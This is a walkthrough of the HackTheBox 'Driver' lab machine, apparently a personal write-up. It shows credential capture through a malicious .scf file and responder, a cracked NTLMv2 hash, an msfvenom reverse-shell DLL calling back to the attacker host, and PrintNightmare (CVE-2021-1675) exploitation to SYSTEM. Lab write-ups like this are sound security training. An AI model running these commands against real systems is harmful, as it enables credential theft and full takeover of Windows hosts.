Driver
An easy Windows box from HackTheBox, getting initial acces by uploading a SCF file for SSRF and bruteforcing authentication, then using printnightmare to get SYSTEM.
Driver
Recon
Running the usual nmap
sudo nmap -sC -sV -oA nmap/driver $IP --open
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-05-18T21:21:32
|_ start_date: 2022-05-18T21:18:17
Can see there are SMB shares with an unauthenticated guest login
Can also see a signin page served on port 80
Just trying some default usernames and passwords, admin:admin works
And able to see a page for updating printer firmware
With a file upload under the “Firmware Updates” tab
Uploading reverse shells here is useless because the file goes straight to the SMB share, which took me a little too long to figure out
Instead can leverage the access to SMB share and upload a malicious .scf file that would reference an icon file on an SMB share on the kali machine.
SCF stands for Shell Command File and is a file format that supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop.
As a result File Explorer will reach out to get the icon file and offer Net-NTLMv2 authentication. Since you control the host you can capture the packets and bruteforce the creds.
Exploitation
Start responder to listen to any connections
sudo responder -I tun0
And then craft a malicious .scf to reach out and grab a file from my SMB server
[Shell]
Command=2
IconFile=\\10.10.14.11\exploit.exe
And upload it to get this output from responder
[SMB] NTLMv2-SSP Client : ::ffff:10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:ec601aa82a428b10:F23A0A048C6EE1659EB5277B7E8CEAA8:0101000000000000804DACA3B66AD801A8F89332766E186B0000000002000800300051004400320001001E00570049004E002D003800480043004B00390042004D00420054004B00510004003400570049004E002D003800480043004B00390042004D00420054004B0051002E0030005100440032002E004C004F00430041004C000300140030005100440032002E004C004F00430041004C000500140030005100440032002E004C004F00430041004C0007000800804DACA3B66AD801060004000200000008003000300000000000000000000000002000003F139382CDBB28E8B6BD126049B33F79099332BD36475ADC38AEA9639AEF5A900A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003100000000000000000000000000
Self identifies as a NTLMv2-SSP hash, so can crack it with john
john hash -w=rockyou.txt
Cracks it to be “liltony”
TONY::DRIVER:ec601aa82a428b10:f23a0a048c6ee1659eb5277b7e8ceaa8:0101000000000000804daca3b66ad801a8f89332766e186b0000000002000800300051004400320001001e00570049004e002d003800480043004b00390042004d00420054004b00510004003400570049004e002d003800480043004b003900
42004d00420054004b0051002e0030005100440032002e004c004f00430041004c000300140030005100440032002e004c004f00430041004c000500140030005100440032002e004c004f00430041004c0007000800804daca3b66ad801060004000200000008003000300000000000000000000000002000003f139382cdb
b28e8b6bd126049b33f79099332bd36475adc38aea9639aef5a900a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000:liltony
And then login using evil-winrm
evil-winrm -u tony -p liltony -i 10.10.11.106
Navigate to tony’s desktop, and cat “user.txt”
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
0dd312b395d1307a52d8c5e1d0450af9
After getting this, upload winpeas to the box using evil-winrm
*Evil-WinRM* PS C:\Users\tony\Desktop> upload winPEASany.exe
And run it with
*Evil-WinRM* PS C:\Users\tony\Desktop> .\winPEASany.exe
Huge rabbit hole with an exploitable Ricoh printer driver, its vulnerable to RCE but difficult to exploit
Instead opt for printnightmare checks
Make a malicious dll with msfvenom
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=5555 -f dll -o dll.dll
Then use CVE-2021-1675, a python POC
It requires a smb share, so run it with impacket within the directory holding the malicious dll
impacket-smbserver share . -smb2support
Set up a listener on 5555 and then execute the script
./CVE-2021-1675.py driver.htb/tony:liltony@10.10.11.106 '\\10.10.14.11\share\dll.dll'
And get SYSTEM on the box